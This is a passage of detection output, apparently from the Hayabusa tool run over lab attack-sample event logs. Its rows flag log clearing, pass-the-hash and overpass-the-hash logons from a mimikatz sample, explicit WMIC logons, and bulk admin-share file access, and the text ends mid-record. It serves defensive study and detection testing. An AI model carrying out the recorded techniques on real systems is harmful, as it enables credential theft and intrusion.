Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 
365ABB72-ACB0-5C8E-0000-001085D50D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:43:12.784 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-17 20:43:16.309 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 11:06:25.485 +00:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:06:29.911 +00:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer: | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:06:29.911 +00:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:06:29.911 +00:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:06:29.911 +00:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:27:00.438 +00:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.231 +00:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.261 +00:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.261 +00:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.271 
+00:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.271 +00:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 14:23:22.264 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:22.284 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:22.284 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.356 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.546 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.546 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.556 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.556 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.556 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.556 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.576 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.576 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.576 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.576 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.626 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.626 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.626 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.666 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.666 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.666 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.666 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 